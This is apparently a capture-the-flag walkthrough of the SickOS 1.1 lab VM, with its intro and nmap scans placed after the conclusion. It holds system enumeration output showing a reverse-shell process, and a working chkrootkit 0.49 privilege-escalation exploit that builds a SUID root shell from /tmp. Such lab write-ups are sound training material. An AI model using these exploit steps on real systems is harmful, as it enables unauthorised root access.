drwxr-xr-x 84 root root  4096 Jan  5 09:41 ..
-rw-r--r--  1 root root   102 Jun 19  2012 .placeholder
-rwxr-xr-x  1 root root 15399 Nov 15  2013 apt
-rwxr-xr-x  1 root root   314 Apr 18  2013 aptitude
-rwxr-xr-x  1 root root   502 Mar 31  2012 bsdmainutils
-rwxr-xr-x  1 root root  2032 Jun  4  2014 chkrootkit
-rwxr-xr-x  1 root root   256 Oct 14  2013 dpkg
-rwxr-xr-x  1 root root   338 Dec 20  2011 lighttpd
-rwxr-xr-x  1 root root   372 Oct  4  2011 logrotate
-rwxr-xr-x  1 root root  1365 Dec 28  2012 man-db
-rwxr-xr-x  1 root root   606 Aug 17  2011 mlocate
-rwxr-xr-x  1 root root   249 Sep 12  2012 passwd
-rwxr-xr-x  1 root root  2417 Jul  1  2011 popularity-contest
-rwxr-xr-x  1 root root  2947 Jun 19  2012 standard

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 30  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x  2 root root 4096 Mar 30  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root  102 Jun 19  2012 .placeholder

/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 Mar 30  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root  102 Jun 19  2012 .placeholder
-rwxr-xr-x  1 root root  730 Sep 13  2013 apt-xapian-index
-rwxr-xr-x  1 root root  907 Dec 28  2012 man-db


Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root    cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING  ##########################################
Network & IP info:
eth0      Link encap:Ethernet  HWaddr 00:0c:29:98:f5:19
          inet addr:192.168.1.9  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe98:f519/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:268 errors:0 dropped:0 overruns:0 frame:0
          TX packets:201 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:142432 (142.4 KB)  TX bytes:22042 (22.0 KB)
          Interrupt:19 Base address:0x2000

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)


Nameserver(s):
nameserver 192.168.1.1


Default route:
default         192.168.1.1     0.0.0.0         UG    100    0        0 eth0


Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -            
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -            
tcp        0      0 192.168.1.9:56045       192.168.1.20:443        ESTABLISHED 984/php-cgi  
tcp        0      0 192.168.1.9:80          192.168.1.20:48676      ESTABLISHED -            
tcp6       0      0 :::22                   :::*                    LISTEN      -            


Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -            


### SERVICES #############################################
Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.5  0.1   3396  1832 ?        Ss   09:41   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S    09:41   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    09:41   0:00 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:0]
root         5  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/0:0H]
root         6  0.1  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:0]
root         7  0.0  0.0      0     0 ?        S    09:41   0:00 [migration/0]
root         8  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    09:41   0:00 [rcu_sched]
root        10  0.0  0.0      0     0 ?        S    09:41   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S<   09:41   0:00 [khelper]
root        12  0.0  0.0      0     0 ?        S    09:41   0:00 [kdevtmpfs]
root        13  0.0  0.0      0     0 ?        S<   09:41   0:00 [netns]
root        14  0.0  0.0      0     0 ?        S<   09:41   0:00 [writeback]
root        15  0.0  0.0      0     0 ?        S<   09:41   0:00 [kintegrityd]
root        16  0.0  0.0      0     0 ?        S<   09:41   0:00 [bioset]
root        17  0.0  0.0      0     0 ?        S<   09:41   0:00 [kworker/u17:0]
root        18  0.0  0.0      0     0 ?        S<   09:41   0:00 [kblockd]
root        19  0.0  0.0      0     0 ?        S<   09:41   0:00 [ata_sff]
root        20  0.0  0.0      0     0 ?        S    09:41   0:00 [khubd]
root        21  0.0  0.0      0     0 ?        S<   09:41   0:00 [md]
root        22  0.0  0.0      0     0 ?        S<   09:41   0:00 [devfreq_wq]
root        23  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:1]
root        25  0.0  0.0      0     0 ?        S    09:41   0:00 [khungtaskd]
root        26  0.0  0.0      0     0 ?        S    09:41   0:00 [kswapd0]
root        27  0.0  0.0      0     0 ?        SN   09:41   0:00 [ksmd]
root        28  0.0  0.0      0     0 ?        SN   09:41   0:00 [khugepaged]
root        29  0.0  0.0      0     0 ?        S    09:41   0:00 [fsnotify_mark]
root        30  0.0  0.0      0     0 ?        S    09:41   0:00 [ecryptfs-kthrea]
root        31  0.0  0.0      0     0 ?        S<   09:41   0:00 [crypto]
root        43  0.0  0.0      0     0 ?        S<   09:41   0:00 [kthrotld]
root        44  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:1]
root        45  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_0]
root        46  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_1]
root        47  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:2]
root        48  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:3]
root        49  0.0  0.0      0     0 ?        S<   09:41   0:00 [dm_bufio_cache]
root        50  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:4]
root        69  0.0  0.0      0     0 ?        S<   09:41   0:00 [deferwq]
root        70  0.0  0.0      0     0 ?        S<   09:41   0:00 [charger_manager]
root        71  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/0:2]
root       193  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt_poll_0]
root       208  0.0  0.0      0     0 ?        S<   09:41   0:00 [mpt/0]
root       220  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_2]
root       221  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_3]
root       227  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_4]
root       229  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_5]
root       231  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_6]
root       232  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_7]
root       233  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_8]
root       234  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_9]
root       237  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_10]
root       238  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_11]
root       239  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_12]
root       240  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_13]
root       241  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_14]
root       242  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_15]
root       243  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_16]
root       244  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_17]
root       245  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_18]
root       246  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_19]
root       247  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_20]
root       248  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_21]
root       249  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_22]
root       250  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_23]
root       251  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_24]
root       252  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_25]
root       253  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_26]
root       254  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_27]
root       255  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_28]
root       256  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_29]
root       257  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_30]
root       258  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_31]
root       259  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:5]
root       260  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:6]
root       261  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:7]
root       262  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:8]
root       263  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:9]
root       264  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:10]
root       265  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:11]
root       266  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:12]
root       267  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:13]
root       268  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:14]
root       269  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:15]
root       270  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:16]
root       271  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:17]
root       272  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:18]
root       273  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:19]
root       274  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:20]
root       275  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:21]
root       276  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:22]
root       277  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:23]
root       278  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:24]
root       279  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:25]
root       280  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:26]
root       281  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:27]
root       282  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:28]
root       283  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:29]
root       284  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:30]
root       285  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:31]
root       286  0.0  0.0      0     0 ?        S    09:41   0:00 [scsi_eh_32]
root       287  0.0  0.0      0     0 ?        S    09:41   0:00 [kworker/u16:32]
root       379  0.0  0.0      0     0 ?        S    09:41   0:00 [jbd2/sda1-8]
root       380  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-rsv-conver]
root       381  0.0  0.0      0     0 ?        S<   09:41   0:00 [ext4-unrsv-conv]
root       469  0.0  0.0   2832   608 ?        S    09:41   0:00 upstart-udev-bridge --daemon
root       471  0.0  0.1   3080  1296 ?        Ss   09:41   0:00 /sbin/udevd --daemon
102        547  0.0  0.0   3256   652 ?        Ss   09:41   0:00 dbus-daemon --system --fork --activation=upstart
syslog     557  0.1  0.1  30036  1472 ?        Sl   09:41   0:00 rsyslogd -c5
root       622  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
root       623  0.0  0.0   3020   812 ?        S    09:41   0:00 /sbin/udevd --daemon
root       642  0.0  0.0      0     0 ?        S<   09:41   0:00 [ttm_swap]
root       706  0.0  0.0      0     0 ?        S<   09:41   0:00 [kpsmoused]
root       752  0.0  0.0   2844   348 ?        S    09:41   0:00 upstart-socket-bridge --daemon
root       797  0.0  0.0   2924   404 ?        Ss   09:41   0:00 dhclient3 -e IF_METRIC=100 -pf /var/run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases -1 eth0
root       819  0.0  0.2   6680  2400 ?        Ss   09:41   0:00 /usr/sbin/sshd -D
root       899  0.0  0.0   4628   840 tty4     Ss+  09:41   0:00 /sbin/getty -8 38400 tty4
root       903  0.0  0.0   4628   836 tty5     Ss+  09:41   0:00 /sbin/getty -8 38400 tty5
root       907  0.0  0.0   4628   844 tty2     Ss+  09:41   0:00 /sbin/getty -8 38400 tty2
root       908  0.0  0.0   4628   832 tty3     Ss+  09:41   0:00 /sbin/getty -8 38400 tty3
root       912  0.0  0.0   4628   836 tty6     Ss+  09:41   0:00 /sbin/getty -8 38400 tty6
root       920  0.0  0.0   2616   884 ?        Ss   09:41   0:00 cron
daemon     921  0.0  0.0   2468   348 ?        Ss   09:41   0:00 atd
www-data   966  0.0  0.2   8272  2236 ?        S    09:41   0:00 /usr/sbin/lighttpd -f /etc/lighttpd/lighttpd.conf
www-data   968  0.0  0.4  17844  4720 ?        Ss   09:41   0:00 /usr/bin/php-cgi
www-data   982  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
www-data   983  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
www-data   984  0.0  0.2  18100  3072 ?        S    09:41   0:00 /usr/bin/php-cgi
www-data   985  0.0  0.1  17844  1752 ?        S    09:41   0:00 /usr/bin/php-cgi
root      1003  0.0  0.0   4628   836 tty1     Ss+  09:41   0:00 /sbin/getty -8 38400 tty1
root      1187  0.0  0.0  22584   564 ?        Ssl  09:41   0:00 /usr/sbin/vmware-vmblock-fuse -o subtype=vmware-vmblock,default_permissions,allow_other /var/run/vmblock-fuse
root      1206  0.1  0.5  11268  5660 ?        S    09:41   0:00 /usr/sbin/vmtoolsd
root      1230  0.0  0.7  14736  7840 ?        S    09:41   0:00 /usr/lib/vmware-vgauth/VGAuthService -s
www-data  1243  0.0  0.0   2232   544 ?        S    09:41   0:00 sh -c uname -a; w; id; /bin/bash -i
www-data  1247  0.0  0.1   3448  1708 ?        S    09:41   0:00 /bin/bash -i
www-data  3185  0.2  0.1   3412  1428 ?        S    09:43   0:00 /bin/bash ./1.sh
www-data  3467  0.0  0.0   3384   644 ?        S    09:43   0:00 /bin/bash ./1.sh
www-data  3468  0.0  0.1   2860  1032 ?        R    09:43   0:00 ps aux


Process binaries & associated permissions (from above list):
-rwxr-xr-x 1 root root 920788 Mar 28  2013 /bin/bash
-rwxr-xr-x 2 root root  26696 Mar 29  2012 /sbin/getty
-rwxr-xr-x 1 root root 194528 Jan 18  2013 /sbin/init
-rwxr-xr-x 1 root root 177552 Jul 19  2013 /sbin/udevd
lrwxrwxrwx 1 root root     25 Apr 12  2016 /usr/bin/php-cgi -> /etc/alternatives/php-cgi
lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin32/appLoader
-rwxr-xr-x 1 root root 187332 Dec 20  2011 /usr/sbin/lighttpd
-rwxr-xr-x 1 root root 531776 Jan 13  2016 /usr/sbin/sshd
lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin32/vmtoolsd
lrwxrwxrwx 1 root root     37 Mar 30  2016 /usr/sbin/vmware-vmblock-fuse -> /usr/lib/vmware-tools/bin32/appLoader


/etc/init.d/ binary permissions:
total 144
drwxr-xr-x  2 root root 4096 Apr 12  2016 .
drwxr-xr-x 84 root root 4096 Jan  5 09:41 ..
-rw-r--r--  1 root root    0 Mar 30  2016 .legacy-bootordering
-rw-r--r--  1 root root 2427 Jul 26  2012 README
-rwxr-xr-x  1 root root 4596 Sep 25  2012 apparmor
lrwxrwxrwx  1 root root   21 Oct 25  2011 atd -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2444 Jul 26  2012 bootlogd
lrwxrwxrwx  1 root root   21 Apr 19  2012 console-setup -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jun 19  2012 cron -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jun 13  2013 dbus -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Nov 26  2013 dmesg -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1242 Dec 13  2011 dns-clean
lrwxrwxrwx  1 root root   21 Mar 14  2012 friendly-recovery -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1105 Dec 15  2015 grub-common
-rwxr-xr-x  1 root root 1329 Jul 26  2012 halt
lrwxrwxrwx  1 root root   21 May 26  2011 hostname -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Mar 29  2012 hwclock-save -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Feb  3  2012 irqbalance -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 1293 Jul 26  2012 killprocs
-rwxr-xr-x  1 root root 2545 Aug 19  2010 lighttpd
lrwxrwxrwx  1 root root   21 Nov 20  2011 module-init-tools -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-container -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Sep 19  2013 network-interface-security -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2797 Feb 13  2012 networking
-rwxr-xr-x  1 root root  882 Jul 26  2012 ondemand
lrwxrwxrwx  1 root root   21 Sep 12  2012 passwd -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-log -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-ready -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-splash -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-stop -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 May 16  2013 plymouth-upstart-bridge -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  561 Feb  4  2011 pppd-dns
lrwxrwxrwx  1 root root   21 Oct 28  2013 procps -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 8635 Jul 26  2012 rc
-rwxr-xr-x  1 root root  801 Jul 26  2012 rc.local
-rwxr-xr-x  1 root root  117 Jul 26  2012 rcS
-rwxr-xr-x  1 root root  639 Jul 26  2012 reboot
lrwxrwxrwx  1 root root   21 Sep  8  2012 resolvconf -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 4395 Nov  8  2011 rsync
lrwxrwxrwx  1 root root   21 Nov 26  2013 rsyslog -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 4321 Jul 26  2012 sendsigs
lrwxrwxrwx  1 root root   21 Apr 19  2012 setvtrgb -> /lib/init/upstart-job
-rwxr-xr-x  1 root root  590 Jul 26  2012 single
-rw-r--r--  1 root root 4304 Jul 26  2012 skeleton
-rwxr-xr-x  1 root root 4371 Jan 13  2016 ssh
-rwxr-xr-x  1 root root  567 Jul 26  2012 stop-bootlogd
-rwxr-xr-x  1 root root 1143 Jul 26  2012 stop-bootlogd-single
-rwxr-xr-x  1 root root  700 May 23  2012 sudo
lrwxrwxrwx  1 root root   21 Jul 19  2013 udev -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-fallback-graphics -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udev-finish -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udevmonitor -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Jul 19  2013 udevtrigger -> /lib/init/upstart-job
lrwxrwxrwx  1 root root   21 Apr  5  2012 ufw -> /lib/init/upstart-job
-rwxr-xr-x  1 root root 2800 Jul 26  2012 umountfs
-rwxr-xr-x  1 root root 2211 Jul 26  2012 umountnfs.sh
-rwxr-xr-x  1 root root 2926 Jul 26  2012 umountroot
-rwxr-xr-x  1 root root 1985 Jul 26  2012 urandom


### SOFTWARE #############################################
Sudo version:
Sudo version 1.8.3p1


### INTERESTING FILES ####################################
Useful file locations:
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc


Installed compilers:
ii  gcc                             4:4.6.3-1ubuntu5                  GNU C compiler
ii  gcc-4.6                         4.6.3-1ubuntu5                    GNU C compiler


Can we read/write sensitive files:
-rw-r--r-- 1 root root 953 Apr 12  2016 /etc/passwd
-rw-r--r-- 1 root root 620 Mar 30  2016 /etc/group
-rw-r--r-- 1 root root 665 Mar 30  2016 /etc/profile
-rw-r----- 1 root shadow 810 Apr 25  2016 /etc/shadow


Can't search *.conf files as no keyword was entered

Can't search *.log files as no keyword was entered

Can't search *.ini files as no keyword was entered

All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 604 Oct 19  2011 /etc/deluser.conf
-rw-r--r-- 1 root root 350 Mar 30  2016 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 552 Feb  8  2012 /etc/pam.conf
-rw-r--r-- 1 root root 144 Mar 30  2016 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1260 May  2  2011 /etc/ucf.conf
-rw-r--r-- 1 root root 3343 Sep 30  2013 /etc/gai.conf
-rw-r--r-- 1 root root 92 Apr 19  2012 /etc/host.conf
-rw-r--r-- 1 root root 321 Mar 29  2012 /etc/blkid.conf
-rw-r--r-- 1 root root 475 Apr 19  2012 /etc/nsswitch.conf
-rw-r--r-- 1 root root 2083 Oct 16  2013 /etc/sysctl.conf
-rw-r--r-- 1 root root 1263 Sep  5  2013 /etc/rsyslog.conf
-rw-r--r-- 1 root root 4728 May  2  2012 /etc/hdparm.conf
-rw-r----- 1 root fuse 216 Oct 18  2011 /etc/fuse.conf
-rw-r--r-- 1 root root 56 Apr 12  2016 /etc/chkrootkit.conf
-rw-r--r-- 1 root root 2981 Mar 30  2016 /etc/adduser.conf
-rw-r--r-- 1 root root 6961 Mar 30  2016 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 956 Mar 30  2012 /etc/mke2fs.conf
-rw-r--r-- 1 root root 333 Mar 30  2016 /etc/updatedb.conf
-rw-r--r-- 1 root root 599 Oct  4  2011 /etc/logrotate.conf
-rw-r--r-- 1 root root 2969 Mar 15  2012 /etc/debconf.conf
-rw-r--r-- 1 root root 15752 Jul 25  2009 /etc/ltrace.conf
-rw-r--r-- 1 root root 34 Mar 30  2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 839 Apr  9  2012 /etc/insserv.conf


Any interesting mail in /var/mail:
total 8
drwxrwsr-x  2 root mail 4096 Mar 30  2016 .
drwxr-xr-x 12 root root 4096 Apr 26  2016 ..


### SCAN COMPLETE ####################################
www-data@ubuntu:/tmp$


dpkg -l | grep chkrootkit
rc  chkrootkit                      0.49-4ubuntu1.1                   rootkit detector

echo 'int main(void)' > test.c
echo '{ ' >> test.c
echo 'setgid(0);' >> test.c
echo 'setuid(0);' >> test.c
echo 'execl("/bin/sh", "sh", 0);' >> test.c
echo '}' >> test.c

echo '#!/bin/bash' > update
echo 'chown root /tmp/test' >> update
echo 'chgrp root /tmp/test' >> update
echo 'chmod u+s /tmp/test' >> update

gcc test.c -o test
gcc test.c -o test
test.c: In function 'main':
test.c:5:1: warning: incompatible implicit declaration of built-in function 'execl' [enabled by default]
test.c:5:1: warning: missing sentinel in function call [-Wformat]

www-data@ubuntu:/tmp$ run-parts

drwxr-xr-x 22 root     root      4096 Mar 30  2016 ..
-rwxr-xr-x  1 www-data www-data 40155 Jan  5 09:42 1.sh
-rw-r--r--  1 www-data www-data 40155 Jan  5 09:43 2.py
-rw-r--r--  1 www-data www-data 36801 Jan  5 09:43 3.sh
-rw-r--r--  1 www-data www-data  5123 Jan  5 09:48 37292.c
drwxrwxrwt  2 root     root      4096 Jan  5 09:41 VMwareDnD
srwxr-xr-x  1 www-data www-data     0 Jan  5 09:41 php.socket-0
-rwsrwxrwx  1 root     root      7235 Jan  5 09:59 test
-rw-rw-rw-  1 www-data www-data    69 Jan  5 09:56 test.c
-rw-rw-rw-  1 www-data www-data     2 Jan  5 09:55 test.cls
-rwxrwxrwx  1 www-data www-data    74 Jan  5 09:57 update
-rw-rw-rw-  1 www-data www-data    20 Jan  5 09:56 updatels
-rw-r--r--  1 root     root      1600 Jan  5 09:41 vgauthsvclog.txt.0
drwx------  2 root     root      4096 Jan  5 09:41 vmware-root

www-data@ubuntu:/tmp$ ./test
./test
whoami
root


Regards,
Yuriy Stanchev/URIX

SickOS 1.1

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.1 vulnarable VM: 
https://www.vulnhub.com/entry/sickos-11,132/
Home brewed tools used: https://github.com/iuristanchev/pentesting_tools
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.1.9     00:0c:29:41:9f:01     14     840  VMware, Inc.              



/nmap.sh 192.168.1.9

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Initiating ARP Ping Scan at 20:26
Scanning 192.168.1.9 [1 port]
Completed ARP Ping Scan at 20:26, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:26
Completed Parallel DNS resolution of 1 host. at 20:26, 0.10s elapsed
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
MAC Address: 00:0C:29:41:9F:01 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00011s latency).
PORT   STATE    SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00012s latency).
PORT    STATE         SERVICE
161/udp open|filtered snmp
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00046s latency).
PORT     STATE    SERVICE       VERSION
21/tcp   filtered ftp
22/tcp   open     ssh           OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
23/tcp   filtered telnet
25/tcp   filtered smtp
53/tcp   filtered domain
80/tcp   filtered http
110/tcp  filtered pop3
111/tcp  filtered rpcbind
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  filtered imap
443/tcp  filtered https
445/tcp  filtered microsoft-ds
993/tcp  filtered imaps
995/tcp  filtered pop3s
1723/tcp filtered pptp
3306/tcp filtered mysql
3389/tcp filtered ms-wbt-server
5900/tcp filtered vnc
8080/tcp closed   http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
